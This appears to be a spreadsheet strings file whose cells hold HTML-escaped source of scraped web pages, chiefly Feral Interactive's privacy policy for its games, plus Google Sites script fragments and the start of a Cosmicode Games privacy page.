(Pro)"};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nonce="zyVUt0S7BfUQBQYwEmsorQ"&gt;&lt;/script&gt;&lt;script nonce="zyVUt0S7BfUQBQYwEmsorQ"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier:</t>
  </si>
  <si>
    <t>Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="zyVUt0S7BfUQBQYwEmsorQ"&gt;const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data-sitename="coolnikscom" data-universe="2"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mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:</t>
  </si>
  <si>
    <t>yfqBxc(preventMouseEvents=true|preventDefault=true)</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
	&lt;head&gt;
		&lt;meta http-equiv="content-type" content="text/html; charset=utf-8" /&gt;
		&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
		&lt;meta name="description" content="Explains data usage and privacy within Feral Interactive games and technical support." /&gt;
						&lt;title&gt;Privacy Policy - Games | Feral Interactive&lt;/title&gt;
		&lt;link href="/css/style.1599754859.css" rel="stylesheet" type="text/css" /&gt;
		&lt;script type="text/javascript" src="/components/modernizr/modernizr.1465302434.js"&gt;&lt;/script&gt;
		&lt;script type="text/javascript" src="/components/modernizr-csspointerevents/modernizr-csspointerevents.1465302614.js"&gt;&lt;/script&gt;
		&lt;!--[if lt IE 9]&gt;
			&lt;script type="text/javascript" src="/components/html5shiv/dist/html5shiv.min.1465302613.js"&gt;&lt;/script&gt;
		&lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
		&lt;link rel="apple-touch-icon" href="/images/touch-icon-iphone-precomposed.png" /&gt;
		&lt;link rel="apple-touch-icon" sizes="72x72" href="/images/touch-icon-ipad-precomposed.png" /&gt;
		&lt;link rel="apple-touch-icon" sizes="114x114" href="/images/touch-icon-iphone-hr-precomposed.png" /&gt;
		&lt;link rel="apple-touch-icon" sizes="144x144" href="/images/touch-icon-ipad-hr-precomposed.png" /&gt;
		&lt;link rel="canonical" href="https://www.feralinteractive.com/en/about/privacy/games/" /&gt;
					&lt;link rel="alternate" hreflang="en" href="https://www.feralinteractive.com/en/about/privacy/games/" /&gt;
					&lt;link rel="alternate" hreflang="de" href="https://www.feralinteractive.com/de/about/privacy/games/" /&gt;
					&lt;link rel="alternate" hreflang="fr" href="https://www.feralinteractive.com/fr/about/privacy/games/" /&gt;
					&lt;link rel="alternate" hreflang="it" href="https://www.feralinteractive.com/it/about/privacy/games/" /&gt;
					&lt;link rel="alternate" hreflang="es" href="https://www.feralinteractive.com/es/about/privacy/games/" /&gt;
					&lt;link rel="alternate" hreflang="ru" href="https://www.feralinteractive.com/ru/about/privacy/games/" /&gt;
					&lt;link rel="alternate" hreflang="pt_br" href="https://www.feralinteractive.com/br/about/privacy/games/" /&gt;
					&lt;link rel="alternate" hreflang="zh_cn" href="https://www.feralinteractive.com/cn/about/privacy/games/" /&gt;
							&lt;link href="/css/privacypolicy.1599754858.css" rel="stylesheet" type="text/css" /&gt;
		&lt;link rel="SHORTCUT ICON" href="/favicon.ico" /&gt;
		&lt;link rel="mask-icon" href="/images/avatar-safari-pinned.svg" color="#dc5206" /&gt;
		&lt;style&gt;
			#global { background: url("/data/games/railroads-ios/banner/banner-wide.jpg") no-repeat 0 0 / 950px 86px transparent }			@media (-webkit-min-device-pixel-ratio: 2), (min-resolution: 192dpi) { #global { background: url("/data/games/railroads-ios/banner/banner-wide@2x.jpg") no-repeat 0 0 / 950px 86px transparent } }			#background_right { background-image: url("/data/games/railroads-ios/background/right.jpg") }			#background_left { background-image: url("/data/games/railroads-ios/background/left.jpg") }			
			@media (-webkit-min-device-pixel-ratio: 2), (min-resolution: 192dpi)</t>
  </si>
  <si>
    <t>{ #background_right { background-image: url("/data/games/railroads-ios/background/right@2x.jpg"); background-size: auto 824px; } }			@media (-webkit-min-device-pixel-ratio: 2), (min-resolution: 192dpi) { #background_left { background-image: url("/data/games/railroads-ios/background/left@2x.jpg"); background-size: auto 824px; } }					&lt;/style&gt;
		&lt;script type="text/javascript" src="/components/jquery/dist/jquery.min.1465300943.js"&gt;&lt;/script&gt;
		&lt;script type="text/javascript"&gt;
		window.onerror = function(msg, url, line) {
			jQuery.ajax({
				url: '/helpers/logjs.php', 
				data: { message: msg, url: url, line: line, path: document. URL },
				type: 'POST',
			});
		}
		&lt;/script&gt;
		&lt;script type="text/javascript" src="/components/video.js/dist/video.min.1465302615.js"&gt;&lt;/script&gt;
		&lt;script type="text/javascript" src="/components/FeralVideo/js/feralvideo.jquery.1469123024.js"&gt;&lt;/script&gt;
		&lt;script type="text/javascript" src="/components/QuickShare/dist/quickshare.min.1465302319.js"&gt;&lt;/script&gt;
		&lt;script type="text/javascript" src="/components/FeralShare/js/feralshare.jquery.1469121655.js"&gt;&lt;/script&gt;
		&lt;script type="text/javascript" src="/js/feral.jquery.1592294486.js"&gt;&lt;/script&gt;
		&lt;script type="text/javascript"&gt;
			var _gaq = _gaq ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];
			_gaq.push(['_setAccount', 'UA-811638-3']);
			_gaq.push(['_setDomainName', '.feralinteractive.com']);
			_gaq.push(['_setSiteSpeedSampleRate', 100]);
			_gaq.push(['_trackPageview']);
			(function() {
				var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
				ga.src = ('https:' == document.location.protocol ? ' https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
				var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
			})();
		&lt;/script&gt;
			&lt;/head&gt;
	&lt;body class="en location-us about privacy games  "&gt;
		&lt;img id='loader' src='/images/loader.svg' /&gt;&lt;span id="loading_text"&gt;&lt;/span&gt;
		&lt;section id="pageWrapper"&gt;
						&lt;header id="global"&gt;
				&lt;a id="feral_banner_homelink" href="/en/"&gt; &lt;/a&gt;
				&lt;nav id="global_links"&gt;
					&lt;ul&gt;						&lt;li class="global-link " id="global-home-link"&gt;&lt;a href='/en/'&gt;Home&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link " id="global-news-link"&gt;&lt;a href='/en/news/'&gt;News&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link " id="global-macgames-link"&gt;&lt;a href='/en/mac-games/'&gt;macOS&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link " id="global-linuxgames-link"&gt;&lt;a href='/en/linux-games/'&gt;Linux&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link " id="global-iosgames-link"&gt;&lt;a href='/en/ios-games/'&gt;iOS&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link " id="global-androidgames-link"&gt;&lt;a href='/en/android-games/'&gt;Android&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link " id="global-switchgames-link"&gt;&lt;a href='/en/switch-games/'&gt;Switch&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link " id="global-store-link"&gt;&lt;a href='https://store.feralinteractive.com/en/'&gt;Store&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link " id="global-support-link"&gt;&lt;a href='http://support.feralinteractive.com/en/'&gt;Support&lt;/a&gt;&lt;/li&gt;
											&lt;li class="global-link mainmenulinkactive" id="global-about-link"&gt;&lt;a href='/en/about/'&gt;About&lt;/a&gt;&lt;/li&gt;
					&lt;/ul&gt;
				&lt;/nav&gt;
				&lt;nav id='lang_select'&gt;
					&lt;a id='lang_select_open' href="#lang_select"&gt;English&lt;/a&gt;
					&lt;ul&gt;						&lt;li&gt;&lt;a href="/en/about/privacy/games/" rel="alternate" hreflang="en"&gt;English&lt;/a&gt;&lt;/li&gt;
											&lt;li&gt;&lt;a href="/de/about/privacy/games/" rel="alternate" hreflang="de"&gt;Deutsch&lt;/a&gt;&lt;/li&gt;
											&lt;li&gt;&lt;a href="/fr/about/privacy/games/" rel="alternate" hreflang="fr"&gt;Français&lt;/a&gt;&lt;/li&gt;
											&lt;li&gt;&lt;a href="/it/about/privacy/games/" rel="alternate" hreflang="it"&gt;Italiano&lt;/a&gt;&lt;/li&gt;
											&lt;li&gt;&lt;a href="/es/about/privacy/games/" rel="alternate" hreflang="es"&gt;Español&lt;/a&gt;&lt;/li&gt;
											&lt;li&gt;&lt;a href="/ru/about/privacy/games/" rel="alternate" hreflang="ru"&gt;Pусский&lt;/a&gt;&lt;/li&gt;
											&lt;li&gt;&lt;a href="/br/about/privacy/games/" rel="alternate" hreflang="pt_br"&gt;Português&lt;/a&gt;&lt;/li&gt;
											&lt;li&gt;&lt;a href="/cn/about/privacy/games/" rel="alternate" hreflang="zh_cn"&gt;简体中文&lt;/a&gt;&lt;/li&gt;
					&lt;/ul&gt;
				&lt;/nav&gt;
			</t>
  </si>
  <si>
    <t>&lt;/header&gt;
			&lt;nav id="local"&gt;&lt;div class="box local_links"&gt;
  &lt;h3&gt;&lt;a href='/en/about/'&gt;About&lt;/a&gt;&lt;/h3&gt;
    &lt;ul&gt;&lt;li &gt;&lt;a href='/en/about/'&gt;About Feral&lt;/a&gt;&lt;/li&gt;&lt;li &gt;&lt;a href='/en/about/careers/'&gt;Careers&lt;/a&gt;&lt;/li&gt;&lt;li &gt;&lt;a href='/en/about/privacy/'&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;&lt;li &gt;&lt;a href='/en/about/sitemap/'&gt;Sitemap&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;
  &lt;div class="box"&gt;
  &lt;h3&gt;Select a game&lt;/h3&gt;   &lt;select id='game_select'&gt;
  &lt;option&gt;&lt;/option&gt;
  &lt;option value="shogun2twfots"&gt;A Total War Saga: FALL OF THE SAMURAI&lt;/option&gt;&lt;option value="thronesofbritanniatw"&gt;A Total War Saga: THRONES OF BRITANNIA&lt;/option&gt;&lt;option value="troytw"&gt;A Total War Saga: TROY&lt;/option&gt;&lt;option value="alienisolation"&gt;Alien: Isolation - The Collection&lt;/option&gt;&lt;option value="alienisolation-switch"&gt;Alien: Isolation for Nintendo Switch&lt;/option&gt;&lt;option value="alienisolation-ios"&gt;Alien: Isolation for mobile&lt;/option&gt;&lt;option value="bioshock2remastered"&gt;BioShock 2 Remastered&lt;/option&gt;&lt;option value="bioshockremastered"&gt;BioShock Remastered&lt;/option&gt;&lt;option value="companyofheroes2"&gt;Company of Heroes 2&lt;/option&gt;&lt;option value="companyofheroes2mastercollection"&gt;Company of Heroes 2: Master Collection&lt;/option&gt;&lt;option value="companyofheroescollection-ios"&gt;Company of Heroes Collection for iOS&lt;/option&gt;&lt;option value="companyofheroes-ios"&gt;Company of Heroes for mobile&lt;/option&gt;&lt;option value="deusexmd"&gt;Deus Ex: Mankind Divided&lt;/option&gt;&lt;option value="deusexmddeluxe"&gt;Deus Ex: Mankind Divided - Digital Deluxe Edition&lt;/option&gt;&lt;option value="empire"&gt;Empire: Total War&lt;/option&gt;&lt;option value="empirecollection"&gt;Empire: Total War Collection&lt;/option&gt;&lt;option value="gridautosportedition-ios"&gt;GRID Autosport Custom Edition for mobile&lt;/option&gt;&lt;option value="gridautosport-switch"&gt;GRID Autosport for Nintendo Switch&lt;/option&gt;&lt;option value="gridautosport-ios"&gt;GRID Autosport for mobile&lt;/option&gt;&lt;option value="gridlegends"&gt;GRID Legends&lt;/option&gt;&lt;option value="hitmangoty"&gt;HITMAN – Game Of The Year Edition&lt;/option&gt;&lt;option value="lifeisstrange"&gt;Life Is Strange&lt;/option&gt;&lt;option value="lifeisstrange2"&gt;Life is Strange 2&lt;/option&gt;&lt;option value="lisbeforethestorm"&gt;Life is Strange:</t>
  </si>
  <si>
    <t>Before the Storm&lt;/option&gt;&lt;option value="medieval2"&gt;Medieval II: Total War&lt;/option&gt;&lt;option value="napoleontw"&gt;Napoleon: Total War&lt;/option&gt;&lt;option value="rometwalex-ios"&gt;ROME: Total War - Alexander for mobile&lt;/option&gt;&lt;option value="rometw-ios"&gt;ROME: Total War for mobile&lt;/option&gt;&lt;option value="riseofthetombraider"&gt;Rise of the Tomb Raider: 20 Year Celebration&lt;/option&gt;&lt;option value="shadowofthetombraider"&gt;Shadow of the Tomb Raider – Definitive Edition&lt;/option&gt;&lt;option value="railroads"&gt;Sid Meier's Railroads!&lt;/option&gt;&lt;option value="railroads-ios"&gt;Sid Meier's Railroads! for mobile&lt;/option&gt;&lt;option value="sleepingdogs"&gt;Sleeping Dogs: Definitive Edition&lt;/option&gt;&lt;option value="thief"&gt;Thief&lt;/option&gt;&lt;option value="tombraider"&gt;Tomb Raider&lt;/option&gt;&lt;option value="rometwremastered"&gt;Total War: ROME REMASTERED&lt;/option&gt;&lt;option value="shogun2tw"&gt;Total War: SHOGUN 2&lt;/option&gt;&lt;option value="shogun2twcollection"&gt;Total War: SHOGUN 2 Collection&lt;/option&gt;&lt;option value="threekingdomstw"&gt;Total War: THREE KINGDOMS&lt;/option&gt;&lt;option value="warhammertw"&gt;Total War: WARHAMMER&lt;/option&gt;&lt;option value="warhammer2tw"&gt;Total War: WARHAMMER II&lt;/option&gt;&lt;option</t>
  </si>
  <si>
    <t>value="warhammer3tw"&gt;Total War: WARHAMMER III&lt;/option&gt;&lt;option value="medieval2-ios"&gt;Total War: MEDIEVAL II for mobile&lt;/option&gt;&lt;option value="tropico-ios"&gt;Tropico for mobile&lt;/option&gt;&lt;option value="dawnofwar3"&gt;Warhammer 40,000: Dawn of War III&lt;/option&gt;&lt;option value="dawnofwar2"&gt;Warhammer 40,000: Dawn of War II&lt;/option&gt;&lt;option value="dawnofwar2grandmastercollection"&gt;Warhammer 40,000: Dawn of War II - Grand Master Collection&lt;/option&gt;&lt;option value="xcom2collection"&gt;XCOM 2</t>
  </si>
  <si>
    <t>Collection&lt;/option&gt;&lt;option value="xcom2collection-ios"&gt;XCOM 2 Collection for mobile&lt;/option&gt;  &lt;/select&gt;
  &lt;/div&gt;
  &lt;div class="box registerdiv"&gt;
  &lt;h3&gt;&lt;a href='/en/register/'&gt;Register&lt;/a&gt;&lt;/h3&gt;
    &lt;ul&gt;
      &lt;li class='register'&gt;
        &lt;p&gt;Stay tuned!&lt;/p&gt;
         &lt;a href="/en/register/"&gt;&lt;span class="register_button"&gt;Register&lt;/span&gt;&lt;/a&gt;
        &lt;div class="clearfix"&gt;&lt;/div&gt;
      &lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;
&lt;/nav&gt;
			&lt;section id="content"&gt;
									&lt;nav id="breadcrumbs"&gt;
						&lt;ul&gt;							&lt;li&gt;&lt;a href='/en/about/'&gt;About&lt;/a&gt;&lt;/li&gt;
													&lt;li&gt;&lt;a href='/en/about/privacy/'&gt;Privacy&lt;/a&gt;&lt;/li&gt;
													&lt;li&gt;&lt;a href='/en/about/privacy/games/'&gt;Games Policy&lt;/a&gt;&lt;/li&gt;
						&lt;/ul&gt;
					&lt;/nav&gt;
				&lt;div id="privacypolicytext"&gt;
&lt;div id="privimage"&gt;&lt;/div&gt;
&lt;h1&gt;Privacy policy for our games&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;Note: This policy covers the particulars of data usage in our games.</t>
  </si>
  <si>
    <t>We also offer a general &lt;a href="/en/about/privacy/"&gt;statement of principle&lt;/a&gt; concerning your privacy, a detailed &lt;a href="/en/about/privacy/web/"&gt;web privacy policy&lt;/a&gt; and an explanation &lt;a href="/en/about/privacy/cookies/"&gt;how our site uses cookies&lt;/a&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; Feral Interactive holds all communications between it and its customers in confidence. Unless required to do so by law we do not disclose any information received to other companies, organizations, individuals, groups, agencies or entities.&lt;/p&gt;
&lt;p&gt;For ease of reading, this document has been kept concise.</t>
  </si>
  <si>
    <t>If you have any questions or would like more detail please &lt;a href="mailto:support@feralinteractive.com"&gt;contact us&lt;/a&gt; - we would welcome your enquiry.&lt;/p&gt;
&lt;p&gt;Please note that games purchased via the App Store, the Mac App Store or Steam will use each retailer’s own update system. This policy only covers Feral Interactive’s system.&lt;/p&gt;
&lt;h2&gt; General/What information do we receive?&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We receive various different types of information, including hardware specs, software versions and usage data. These are not used to identify individuals. 
 However, we also collect personal details such as email addresses and usernames, where these are integral to the service we provide.&lt;/p&gt;
&lt;h3&gt;Product Activation&lt;/h3&gt;
&lt;p&gt;Some of our Mac games use a product activation system (requiring a “product key”) that collects information about your Mac’s hardware and registers your game to a particular computer.</t>
  </si>
  <si>
    <t>The information that it collects is not used to identify you personally.&lt;/p&gt;
&lt;p&gt;Games that are activated via the App Store (iOS games only), the Mac App Store (Mac games only) or Steam (Mac or Linux) use different systems that are managed by Apple or Valve, and are not activated using this method.&lt;/p&gt;
&lt;h3&gt;Software Updates&lt;/h3&gt;
&lt;p&gt; The text below refers only to Mac games that have been activated using a product key (see above). Games bought from the App Store, the Mac App Store or Steam use different update mechanisms, which are not covered here.</t>
  </si>
  <si>
    <t>Feral Interactive is not responsible for any data usage by these platforms; if you are concerned, please check their privacy policies.&lt;/p&gt;
&lt;p&gt;When you launch a game it will contact our servers to check that it is the most recent version of that game. If it is not, you will receive a message in-game offering you the option to update. As part of this process, our server receives version information for your game and system but nothing that can identify you personally.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The information received is not used to identify individuals, rather we use it to improve our understanding of the hardware and operating system software used by our customers. This allows us to refine our development efforts according to their needs.&lt;/p&gt;
&lt;p&gt;If you do not wish to share such information, you can disable the automatic check for updates feature in the pre-game Options window. However, if you do so, you will not receive notifications that updates are available.&lt;/p&gt;
&lt;h3&gt;Other Updates&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We sometimes update the documentation and default settings of our games. In order to do this, the game checks with our servers to make sure these things are up-to-date. This process only collects non-personal information such as the version of your OS, the game title and its version number.&lt;/p&gt;
&lt;p&gt;This process is used by almost all our games, both those that are activated using a product key (see above) and those which are bought from the App Store, the Mac App Store or Steam.&lt;/p&gt;
&lt;h3&gt;Support&lt;/h3&gt;
&lt;p&gt;When you send us a support request, we may ask for more information about your system in order to diagnose and fix the problem.&lt;/p&gt;
&lt;p&gt;For Mac games, this information is gathered in a system report.</t>
  </si>
  <si>
    <t>System reports use information generated by Apple’s System Information application and contain detailed descriptions of your computer’s hardware and software.&lt;/p&gt; 
&lt;p&gt;For Linux games and iOS games, the method you use for passing us this information will vary depending on the software you are using.&lt;/p&gt;
&lt;p&gt; We keep a record of support requests, but we do not use the information they contain (including system reports) for any purpose other than to help solve individual support issues.&lt;/p&gt;
&lt;h3&gt;Crash Reports&lt;/h3&gt;
&lt;p&gt;If a Mac game crashes, a report is automatically created by the OS. The next time the game is launched you will be given the option of sending the crash report to Feral; this may help us fix the issue that caused the crash.</t>
  </si>
  <si>
    <t>You will also have the option of including your email address, so that we may contact you about it. A crash report only contains information about your system and the crash itself, it does not contain any of your personal information. &lt;/p&gt;
&lt;h3&gt;Feral Accounts and Online Features&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>In order to access certain online features, some games require you to log in to a Feral Account. By default your account data is kept private; however, some items such as your username are publicly viewable.&lt;/p&gt;
&lt;p&gt; In order to create a Feral Account, you will need to provide your name, email address and date of birth.</t>
  </si>
  <si>
    <t>We do not disclose this information to any entities other than our trusted partners in order to provide their services. For example, if you create a Feral Account in order to access Contracts mode in &lt;em&gt;Hitman: Absolution – Elite Edition&lt;/em&gt;, your details will be available to Square Enix, who manage the servers that run Contracts mode.&lt;/p&gt;
&lt;p&gt;While you are logged in, the game will occasionally communicate with Feral’s servers as you play, including whenever you start up or shut down a game. We keep records of these communications in order to help us address specific technical issues and to better understand how people play our games.&lt;/p&gt;
&lt;p&gt;Many of our games use third-party services (GameRanger, Game Center, Steam etc.) to enable certain online features.</t>
  </si>
  <si>
    <t>Feral Interactive is not responsible for any data usage by these services; if you are concerned, please check their privacy policies.&lt;/p&gt;
&lt;!-- Game Usage Data - NOT IMPLEMENTED YET
When you play one of our games it might record certain information about your computer, such as which graphics card or gamepad you are using.   We collect this information to help us understand the hardware players are using and focus our development efforts to better match their needs.</t>
  </si>
  <si>
    <t>It is not used to identify individuals. --&gt;
&lt;h3&gt;Changes to this Policy&lt;/h3&gt;
&lt;p&gt; We reserve the right to modify this Privacy Policy at any time, so please review it frequently.</t>
  </si>
  <si>
    <t>A history of amendments to the policy can be found below:&lt;/p&gt;
&lt;p&gt;
&lt;ul&gt;
&lt;li&gt;November 2nd 2016 - Minor re-write for addition of content relating to iOS games.&lt;/li&gt;
&lt;li&gt;November 7th 2014 - Further re-write for accuracy, addition of content relating to Feral Accounts and Linux games.&lt;/li&gt;
&lt;li&gt;August 7th 2013 - Major rewrite for accuracy and clarity.&lt;/li&gt;
&lt;/ul&gt;
&lt;/p&gt;
&lt;/div&gt;&lt;/section&gt;&lt;footer&gt;
&lt;a href="/en/about/privacy/" id="privacypolicy"&gt;Privacy Policy&lt;/a&gt;
&lt;/footer&gt;
&lt;/section&gt;&lt;!-- #pageWrapper --&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="utf-8" /&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /&gt;
    &lt;meta property="og:title" content="Privacy" /&gt;&lt;meta property="og:url" content="https://cosmicode.games/privacy" /&gt;
    &lt;meta name="twitter:title" content="Privacy" /&gt;
    &lt;script type="application/ld+json"&gt;{"@context":"https://schema.org","@type":"WebPage","name":"Cosmicode Games","url":"https://cosmicode.games/privacy"}&lt;/script&gt;
        &lt;link rel="preload" as="style" href="https://cosmicode.games/build/assets/app-29239c9d.css" /&gt;&lt;link rel="modulepreload" href="https://cosmicode.games/build/assets/app-2918755f.js" /&gt;&lt;link rel="stylesheet" href="https://cosmicode.games/build/assets/app-29239c9d.css" /&gt;&lt;script type="module" src="https://cosmicode.games/build/assets/app-2918755f.js"&gt;&lt;/script&gt;    &lt;/head&gt;
&lt;body&gt;
    &lt;div id="app" data-page="{&amp;quot;component&amp;quot;:&amp;quot;Privacy&amp;quot;,&amp;quot;props&amp;quot;:{&amp;quot;errors&amp;quot;:{},&amp;quot;appName&amp;quot;:&amp;quot;Cosmicode Games&amp;quot;,&amp;quot;locales&amp;quot;:{&amp;quot;en&amp;quot;:&amp;quot;English&amp;quot;},&amp;quot;locale&amp;quot;:&amp;quot;en&amp;quot;,&amp;quot;translations&amp;quot;:{&amp;quot;header&amp;quot;:{&amp;quot;games&amp;quot;:&amp;quot;Games&amp;quot;,&amp;quot;about&amp;quot;:&amp;quot;About&amp;quot;,&amp;quot;press&amp;quot;:&amp;quot;Press&amp;quot;,&amp;quot;contact&amp;quot;:&amp;quot;Contact&amp;quot;},&amp;quot;home&amp;quot;:{&amp;quot;title&amp;quot;:&amp;quot;Home&amp;quot;},&amp;quot;games&amp;quot;:{&amp;quot;title&amp;quot;:&amp;quot;Games&amp;quot;,&amp;quot;guessup&amp;quot;:&amp;quot;GuessUp&amp;quot;,&amp;quot;guessupkids&amp;quot;:&amp;quot;GuessUp Kids&amp;quot;,&amp;quot;wordsup&amp;quot;:&amp;quot;Words Up&amp;quot;},&amp;quot;about&amp;quot;:{&amp;quot;title&amp;quot;:&amp;quot;About&amp;quot;},&amp;quot;press&amp;quot;:{&amp;quot;title&amp;quot;:&amp;quot;Press&amp;quot;},&amp;quot;privacy&amp;quot;:{&amp;quot;title&amp;quot;:&amp;quot;Privacy&amp;quot;},&amp;quot;terms&amp;quot;:{&amp;quot;title&amp;quot;:&amp;quot;Terms&amp;quot;}},&amp;quot;user&amp;quot;:null,&amp;quot;flash&amp;quot;:{&amp;quot;message&amp;quot;:null,&amp;quot;type&amp;quot;:null},&amp;quot;ziggy&amp;quot;:{&amp;quot;url&amp;quot;:&amp;quot;https:\/\/cosmicode.games&amp;quot;,&amp;quot;port&amp;quot;:null,&amp;quot;defaults&amp;quot;:[],&amp;quot;routes&amp;quot;:{&amp;quot;sanctum.csrf-cookie&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;sanctum\/csrf-cookie&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.home&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;\/&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.about&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;about&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.press&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;press&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.guessup&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;guessup&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.wordsup&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;wordsup&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.guessupkids&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;guessupkids&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.games&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;games&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.privacy&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;privacy&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.terms&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;terms&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.register&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.register&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.register&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;POST&amp;quot;]},&amp;quot;en.login&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.login&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.generated::CJJQkX7g0hmwx64e&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.login&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;POST&amp;quot;]},&amp;quot;en.password.request&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.forgot_password&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.password.email&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.forgot_password&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;POST&amp;quot;]},&amp;quot;en.password.reset&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.reset_password\/{token}&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.password.update&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.reset_password&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;POST&amp;quot;]},&amp;quot;en.password.change&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.change_password&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.password.changed&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.changed_password&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;POST&amp;quot;]},&amp;quot;en.verification.notice&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.verify_email&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.verification.verify&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.verify_email\/{id}\/{hash}&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.verification.send&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.verification_notification&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;POST&amp;quot;]},&amp;quot;en.password.confirm&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.confirm_password&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;GET&amp;quot;,&amp;quot;HEAD&amp;quot;]},&amp;quot;en.generated::W22ahjR7mr9qYL9U&amp;quot;:{&amp;quot;uri&amp;quot;:&amp;quot;routes.confirm_password&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;POST&amp;quot;]},&amp;quot;en.logout&amp;quot;:{&amp;q